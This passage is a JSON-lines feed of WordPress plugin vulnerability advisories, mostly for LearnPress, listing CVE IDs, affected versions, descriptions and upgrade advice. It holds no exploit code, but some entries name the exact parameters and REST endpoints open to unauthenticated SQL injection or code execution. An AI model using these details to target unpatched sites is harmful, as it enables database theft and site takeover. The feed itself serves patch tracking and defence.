version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2b2671e-0db7-4ba9-b574-a0122959e8fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2b2671e-0db7-4ba9-b574-a0122959e8fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/learnpress\\\/tags\\\/4.2.7&new_path=\\\/learnpress\\\/tags\\\/4.2.7.1&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/learnpress\\\/tags\\\/4.2.7&new_path=\\\/learnpress\\\/tags\\\/4.2.7.1&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8522","slug":"learnpress","versionImpact":"4.2.7","versionEndExcluding":"4.2.7.1","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the \/wp-json\/learnpress\/v1\/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e495507d-7eac-4f38-ab6f-b8f0809b2be4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e495507d-7eac-4f38-ab6f-b8f0809b2be4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/trunk\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-courses-v1-controller.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/trunk\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-courses-v1-controller.php#L441\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148560\\\/learnpress\\\/tags\\\/4.2.7.1\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-courses-v1-controller.php?old=3138586&old_path=learnpress%2Ftags%2F4.2.7%2Finc%2Fjwt%2Frest-api%2Fversion1%2Fclass-lp-rest-courses-v1-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148560\\\/learnpress\\\/tags\\\/4.2.7.1\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-courses-v1-controller.php?old=3138586&old_path=learnpress%2Ftags%2F4.2.7%2Finc%2Fjwt%2Frest-api%2Fversion1%2Fclass-lp-rest-courses-v1-controller.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6589","slug":"learnpress","versionImpact":"4.2.6.8.2","versionEndExcluding":"4.2.6.9","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.6.8.2 via the 'render_content_block_template' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba79bf95-08f8-4aa6-968b-f76a09ce52b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba79bf95-08f8-4aa6-968b-f76a09ce52b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.2\\\/inc\\\/block-template\\\/class-block-template-archive-course.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.2\\\/inc\\\/block-template\\\/class-block-template-archive-course.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.2\\\/inc\\\/block-template\\\/class-block-template-single-course.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.2\\\/inc\\\/block-template\\\/class-block-template-single-course.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124296\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124296\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6099","slug":"learnpress","versionImpact":"4.2.6.8.1","versionEndExcluding":"4.2.6.8.2","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to unauthenticated bypass to user registration in versions up to, and including, 4.2.6.8.1. This is due to missing checks in the 'check_validate_fields' function in the checkout. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled.","recommendation":"Update to version 4.2.6.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ee714c7-4c9b-4627-9ba9-f83aeca6a0a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ee714c7-4c9b-4627-9ba9-f83aeca6a0a5?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/class-lp-checkout.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/class-lp-checkout.php#L124\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109339\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109339\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-6088","slug":"learnpress","versionImpact":"4.2.6.8.1","versionEndExcluding":"4.2.6.8.2","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized user registration due to a missing capability check on the 'register' function in all versions up to, and including, 4.2.6.8.1. This makes it possible for unauthenticated attackers to bypass disabled user registration to create a new account with the default role.","recommendation":"Update to version 4.2.6.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04e0ddff-16af-4c85-b5b0-cf767684ee08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04e0ddff-16af-4c85-b5b0-cf767684ee08?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/jwt\\\/includes\\\/class-jwt-public.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/jwt\\\/includes\\\/class-jwt-public.php#L127\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/class-lp-forms-handler.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/class-lp-forms-handler.php#L235\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109339\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109339\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-5483","slug":"learnpress","versionImpact":"4.2.6.8","versionEndExcluding":"4.2.6.8.1","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.6.8 due to incorrect implementation of get_items_permissions_check function. This makes it possible for unauthenticated attackers to extract basic information about website users, including their emails","recommendation":"Update to version 4.2.6.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/122b75d2-e882-45b9-baf1-acf847f8d60a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/122b75d2-e882-45b9-baf1-acf847f8d60a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-users-v1-controller.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-users-v1-controller.php#L130\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4444","slug":"learnpress","versionImpact":"4.2.6.5","versionEndExcluding":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to bypass to user registration in versions up to, and including, 4.2.6.5. This is due to missing checks in the 'create_account' function in the checkout. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled.","recommendation":"Update to version 4.2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9e1410f-10c9-4654-8b61-cfcdde696da7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9e1410f-10c9-4654-8b61-cfcdde696da7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/inky-knuckle-2c2.notion.site\\\/Improper-Authentication-in-checkout-leads-privilege-escalation-of-unauthenticated-to-create-accoun-09da24a043884219a891dd1a0fc01af6\",\"name\":\"https:\\\/\\\/inky-knuckle-2c2.notion.site\\\/Improper-Authentication-in-checkout-leads-privilege-escalation-of-unauthenticated-to-create-accoun-09da24a043884219a891dd1a0fc01af6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/class-lp-checkout.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/class-lp-checkout.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082204\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082204\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4434","slug":"learnpress","versionImpact":"4.2.6.5","versionEndExcluding":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018term_id\u2019 parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d64e1c6-1e25-4438-974d-b7da0979cc40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d64e1c6-1e25-4438-974d-b7da0979cc40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/inky-knuckle-2c2.notion.site\\\/Unauthenticated-SQLI-in-Learnpress-plugin-Latest-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd?pvs=25\",\"name\":\"https:\\\/\\\/inky-knuckle-2c2.notion.site\\\/Unauthenticated-SQLI-in-Learnpress-plugin-Latest-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd?pvs=25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082204\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082204\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/Databases\\\/class-lp-course-db.php#L508\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/Databases\\\/class-lp-course-db.php#L508\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4397","slug":"learnpress","versionImpact":"4.2.6.5","versionEndExcluding":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'save_post_materials' function in versions up to, and including, 4.2.6.5. This makes it possible for authenticated attackers, with Instructor-level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 4.2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec20d5c4-4c41-4ec9-8d0a-ec8f03634f7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec20d5c4-4c41-4ec9-8d0a-ec8f03634f7d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/rest-api\\\/v1\\\/frontend\\\/class-lp-rest-material-controller.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/rest-api\\\/v1\\\/frontend\\\/class-lp-rest-material-controller.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083657\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083657\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4277","slug":"learnpress","versionImpact":"4.2.6.5","versionEndExcluding":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018layout_html\u2019 parameter in all versions up to, and including, 4.2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46693edf-bcc6-4af8-9f26-5ede865f4694?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46693edf-bcc6-4af8-9f26-5ede865f4694?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/ExternalPlugin\\\/Elementor\\\/Widgets\\\/Instructor\\\/ListInstructorsElementor.php?order=date#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/ExternalPlugin\\\/Elementor\\\/Widgets\\\/Instructor\\\/ListInstructorsElementor.php?order=date#L96\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6294","slug":"popup-builder","versionImpact":"4.2.5","versionEndExcluding":"4.2.6","description":"The Popup Builder WordPress plugin before 4.2.6 does not validate a parameter before making a request to it, which could allow users with the administrator role to perform SSRF attack in Multisite WordPress configurations.","recommendation":"Update to version 4.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eaeb5706-b19c-4266-b7df-889558ee2614\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eaeb5706-b19c-4266-b7df-889558ee2614\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2124","slug":"weglot","versionImpact":"4.2.5","versionEndExcluding":"4.2.6","description":"The Translate WordPress and go Multilingual \u2013 Weglot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget\/block in all versions up to, and including, 4.2.5 due to insufficient input sanitization and output escaping on user supplied attributes such as 'className'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d87134e8-9d73-4a39-b071-37a5dac033b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d87134e8-9d73-4a39-b071-37a5dac033b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weglot\\\/trunk\\\/src\\\/actions\\\/class-register-widget-weglot.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weglot\\\/trunk\\\/src\\\/actions\\\/class-register-widget-weglot.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051523%40weglot&new=3051523%40weglot&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051523%40weglot&new=3051523%40weglot&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6223","slug":"learnpress","versionImpact":"4.2.5.7","versionEndExcluding":"4.2.5.8","description":"The LearnPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.5.7 via the \/wp-json\/lp\/v1\/profile\/course-tab REST API due to missing validation on the 'userID' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve the details of another user's course progress.","recommendation":"Update to version 4.2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/215d5d9e-dabb-462d-8c51-952f8c497b78?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/215d5d9e-dabb-462d-8c51-952f8c497b78?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6634","slug":"learnpress","versionImpact":"4.2.5.7","versionEndExcluding":"4.2.5.8","description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.","recommendation":"Update to version 4.2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21291ed7-cdc0-4698-9ec4-8417160845ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21291ed7-cdc0-4698-9ec4-8417160845ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6567","slug":"learnpress","versionImpact":"4.2.5.7","versionEndExcluding":"4.2.5.8","description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order_by\u2019 parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ab578cd-3a0b-43d3-aaa7-0a01f431a4e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ab578cd-3a0b-43d3-aaa7-0a01f431a4e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5558","slug":"learnpress","versionEndExcluding":"4.2.5.4","description":"The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 4.2.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4148","slug":"oauth2-provider","versionEndExcluding":"4.2.5","description":"The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.2.5 has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated users, such as subscriber to delete arbitrary client.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be9b25c8-b0d7-4c22-81ff-e41650a4ed41\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be9b25c8-b0d7-4c22-81ff-e41650a4ed41\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3894","slug":"oauth2-provider","versionEndExcluding":"4.2.5","description":"The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.2.5 does not have CSRF check when deleting a client, and does not ensure that the object to be deleted is actually a client, which could allow attackers to make a logged in admin delete arbitrary client and post via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298487b2-4141-4c9f-9bb2-e1450aefc1a8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298487b2-4141-4c9f-9bb2-e1450aefc1a8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9943","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.4","versionEndExcluding":"4.2.5","description":"The MultiVendorX \u2013 The Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.4. This is due to missing or incorrect nonce validation on several functions in api\/class-mvx-rest-controller.php. This makes it possible for unauthenticated attackers to update vendor account details, create vendor accounts, and delete arbitrary users via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b950faf9-2122-42af-9f05-ec850767be32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b950faf9-2122-42af-9f05-ec850767be32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L5258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L5258\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L6155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L6155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L6009\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L6009\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173238\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/api\\\/class-mvx-rest-controller.php?old=3168957&old_path=dc-woocommerce-multi-vendor%2Ftrunk%2Fapi%2Fclass-mvx-rest-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173238\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/api\\\/class-mvx-rest-controller.php?old=3168957&old_path=dc-woocommerce-multi-vendor%2Ftrunk%2Fapi%2Fclass-mvx-rest-controller.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9531","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.4","versionEndExcluding":"4.2.5","description":"The MultiVendorX \u2013 The Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mvx_sent_deactivation_request' function in all versions up to, and including, 4.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send a canned email to the site's administrator asking to delete the profile of an arbitrary vendor.","recommendation":"Update to version 4.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5af1063c-615e-4196-9fa6-960c008544c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5af1063c-615e-4196-9fa6-960c008544c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php#L3780\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php#L3780\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173238\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php?contextall=1&old=3168957&old_path=%2Fdc-woocommerce-multi-vendor%2Ftrunk%2Fclasses%2Fclass-mvx-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173238\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php?contextall=1&old=3168957&old_path=%2Fdc-woocommerce-multi-vendor%2Ftrunk%2Fclasses%2Fclass-mvx-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
